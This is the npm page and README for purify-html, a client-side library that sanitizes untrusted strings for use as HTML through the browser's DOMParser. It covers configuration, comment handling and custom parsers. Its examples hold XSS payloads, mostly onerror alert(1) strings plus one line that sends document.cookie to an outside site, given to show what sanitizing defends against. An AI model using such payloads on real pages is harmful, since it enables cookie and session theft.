purify-html
v1.5.9
Published
A minimalistic library for sanitizing strings so that they can be safely used as HTML.
Downloads
139
Readme
purify-html
A minimalist client library for cleaning up strings so they can be safely used as HTML.
Do simple things simply: zero configuration to completely strip a string of HTML, with the ability to incrementally customize as needed.
The basic idea is to use the browser API to parse and modify the DOM. Thus, several goals are achieved at once:
- Actual native parser. The library uses the HTML parser that the browser will use to parse the HTML. Thus, there will be no situation when the payload will work in the browser, but does not work in the parser that the library uses.
- Huge bundle size savings. Since the HTML standard is quite extensive, a quality parser is a rather heavy program that can be easily dispensed with.
- Speed of work. The parser inside DOMParser is native, i.e. written not in JavaScript, but in high-performance C++ (for example, in v8). Thus, parsing is faster than any JavaScript library.
- High % browser support. Although DOMParser has extensive support, you can use a polyfill or even your own parser. See parserSetup for details.
As a result, parsing with DOMParser is more reliable, faster and does not require precious kilobytes of space in the build.
Install
npm
npm install purify-html
yarn
yarn add purify-html
CDN
<script src="https://cdn.jsdelivr.net/npm/purify-html/dist/index.es.js"></script>
<!-- or -->
<script type="module">
import PurifyHTML from 'https://cdn.jsdelivr.net/npm/purify-html/+esm';
</script>
API
import PurifyHTML, { setParser } from 'purify-html';
const sanitizer = new PurifyHTML(options);
function setParser
setParser({
parse(str: string): Element
stringify(elem: Element): string
}): void
See here for details.
sanitizer: object
sanitize(string): string
Performs string cleanup according to the rules passed in options
.
import PurifyHTML, { setParser } from 'purify-html';
const sanitizer = new PurifyHTML(options);
const untrustedString = '...';
console.log(sanitizer.sanitize(untrustedString));
toHTMLEntities(string): string
Coerces a string to HTML entities. Very similar to escaping, but for the HTML interpreter. In HTML, such characters will be rendered "as is". See more here.
const str = '<br />';
console.log(
sanitizer.toHTMLEntities(str); // => '<br />', displays at the page like '<br />'
);
options: Array<string | TagRule>
An array with rules for the sanitizer.
// Deprecated!
type AttributeRulePresetName =
| '%correct-link%'
| '%http-link%'
| '%https-link%'
| '%ftp-link%'
| '%https-link-without-search-params%'
| '%http-link-without-search-params%'
| '%same-origin%';
interface AttributeRule = {
// attribute name
name: string;
// rules for attribute value
value?:
| string
| string[]
| RegExp
| { preset: AttributeRulePresetName } // Deprecated!
| ((attributeValue: string) => boolean);
};
interface TagRule = {
// tagname
name: string;
// rules for attributes
attributes: AttributeRule[];
// Don't remove comments in THIS node.
// Comments in children nodes will be saved
dontRemoveComments?: boolean;
/*
Example:
Config
[
{ name: 'div', dontRemoveComments: true },
'span'
]
Input:
<div>
<!-- comment 0 -->
<span> <!-- comment 1 --> </span>
</div>
Output:
<div>
<!-- comment 0 -->
<span> </span>
</div>
*/
};
import PurifyHTML, { setParser } from 'purify-html';
const sanitizer = new PurifyHTML([
'hr',
{ name: 'br' },
{ name: 'img', attributes: [{ name: 'src' }] },
{
name: 'a',
attributes: [
{ name: 'target', value: ['_blank', '_self', '_parent', '_top'] },
{ name: 'href', value: /^https?:\/\/*/ },
],
},
]);
NOTE When using regular expressions to check for untrusted strings, don't forget to check your regular expressions for ReDoS vulnerabilities. A successful exploit of the ReDoS vulnerability is to cause the program to hang when trying to parse a specially crafted string. See more: https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
Examples
via bundler:
import PurifyHTML from 'purify-html';
const allowedTags = [
// only string
'hr',
// as object
{ name: 'br' },
// attributes check
{ name: 'b', attributes: ['class'] },
// advanced attributes check
{ name: 'p', attributes: [{ name: 'class' }] },
// check attributes values (string)
{ name: 'strong', attributes: [{ name: 'id', value: 'awesome-strong-id' }] },
// check attributes values (RegExp)
{ name: 'em', attributes: [{ name: 'id', value: /awesome-em-id?s/ }] },
// check attributes values (array of strings)
{
name: 'em',
attributes: [
{ name: 'id', value: ['awesome-strong-id', 'other-awesome-strong-id'] },
],
},
// check attribute value (function)
{
name: 'em',
attributes: [{ name: 'id', value: value => value.startsWith('awesome-') }],
},
// use attributes checks preset (Deprecated)
{
name: 'a',
attributes: [{ name: 'href', value: { preset: '%https-link%' } }], // presets are deprecated
},
];
const sanitizer = new PurifyHTML(allowedTags);
const dangerString = `
<script> fetch('google.com', { mode: 'no-cors' }) </script>
<<div></div>img src="1" onerror="alert(1)">
<img src="1" onerror="alert(1)">
<b>Bold</b>
<b class="red">Bold</b>
<b class="red" onclick="alert(1)">Bold</b>
<p data-some="123" data-some-else="321">123</p>
<div></div>
<hr>
`;
const safeString = sanitizer.sanitize(dangerString);
console.log(safeString);
/*
<img src="1" onerror="alert(1)">
<b>Bold</b>
<b class="red">Bold</b>
<b class="red">Bold</b>
<p data-some="123">123</p>
<hr>
*/
Via CDN
<!-- ... -->
<head>
<!-- ... -->
<script src="https://unpkg.com/purify-html@latest/dist/index.es.js"></script>
</head>
<!-- ... -->
<script>
PurifyHTML.setParser(/* ... */);
const sanitizer = new PurifyHTML.sanitizer(/* ... */);
sanitizer.sanitize(/* ... */);
</script>
<!-- ... -->
Usage for the browser is slightly different from usage with faucets. This is bad, but it had to be done in order not to clog the global scope.
HTML comments
Description of the problem
For example the line: <!-- <img src="x" onerror="alert(1)"> -->
.
Technically, inserting it into the DOM will not lead to code execution, but it cannot be considered safe either. The result of the sanitize
method is declared to be sanitized using the rules specified when the sanitizer was initialized.
NOTE CDATA comments (or CDATA sections), although made for XML, are also supported in HTML. In
purify-html
they are treated as regular HTML comments. See more about CDATA Section on MDN
Therefore, you are given the opportunity to control in which places you will leave comments, and in which not.
API
By default, HTML comments are stripped. You can change it like this:
import PurifyHTML from 'purify-html';
const sanitizer = new PurifyHTML(['#comments' /* ... */]);
sanitizer.sanitize(/* ... */);
If you want comments to be removed everywhere except for specific tags, then you can specify it like this:
import PurifyHTML from 'purify-html';
const rules = ['#comments', { name: 'div', dontRemoveComments: true }];
const sanitizer = new PurifyHTML(rules);
sanitizer.sanitize(/* ... */);
node-js
When used in an environment where the standard DOMParser is absent, you need to install a parser manually.
For example:
import { JSDOM } from 'jsdom';
global.DOMParser = new JSDOM().window.DOMParser;
import PurifyHTML from 'purify-html';
const sanitizer = new PurifyHTML(); // works
Or
import { JSDOM } from 'jsdom';
import PurifyHTML, { setParser } from 'purify-html';
// Scope elem variable, reuse DOMParser instance for performance
{
const elem: Element = new DOMParser()
.parseFromString('', 'text/html')
.querySelector('body');
// Set methods
setParser({
parse(string: string): Element {
elem.innerHTML = string;
return elem;
},
stringify(elem: Element): string {
return elem.innerHTML;
},
});
}
setParser
In some cases, you may want to be able to use your parser instead of DOMParser.
This can be done like this:
import PurifyHTML, { setParser } from 'purify-html';
setParser({
parse(HTMLString: string): HTMLElement {
// ...
},
stringify(element: HTMLElement): string {
// ...
},
});
const sanitizer = new PurifyHTML();
// ...
Note! The root element will be passed to the stringify
function, and the CONTENT of the element will be expected as a result.
const input = document.createElement('div');
input.innerHTML = '<span>span</span>';
stringify(input); // '<span>span</span>' => OK
stringify(input); // '<div><span>span</span></div>' => WRONG
Why not document.createElement(...)
Because by processing the string like this:
const parse = str => {
const node = document.createElement('div');
div.innerHTML = str;
return div;
};
In fact, this function, having received a special payload, will RUN it. The following payload will send a network request:
<img/src/onerror="fetch('www.site.com?q='+encodeURI(document.cookie))">
And in the case of using DOMParser, the code does not run.
Attributes checks preset list
%correct-link%
- only currect link%http-link%
- only http link%https-link%
- only https link%ftp-link%
- only ftp link%https-link-without-search-params%
- delete all search params and force https protocol%http-link-without-search-params%
- delete all search params and force https protocol%same-https-origin%
- only link that lead to the same origin that is currently inself.location.origin
. + force https protocol%same-http-origin%
- only link that lead to the same origin that is currently inself.location.origin
. + force http protocol
Browser support
Although browser support is already over 97%, the specification for DOMParser is not yet fully established. More details.
If you find this project helpful, please give it a ⭐️ on GitHub to show your support. I would also appreciate it if you shared it with others who might find it useful!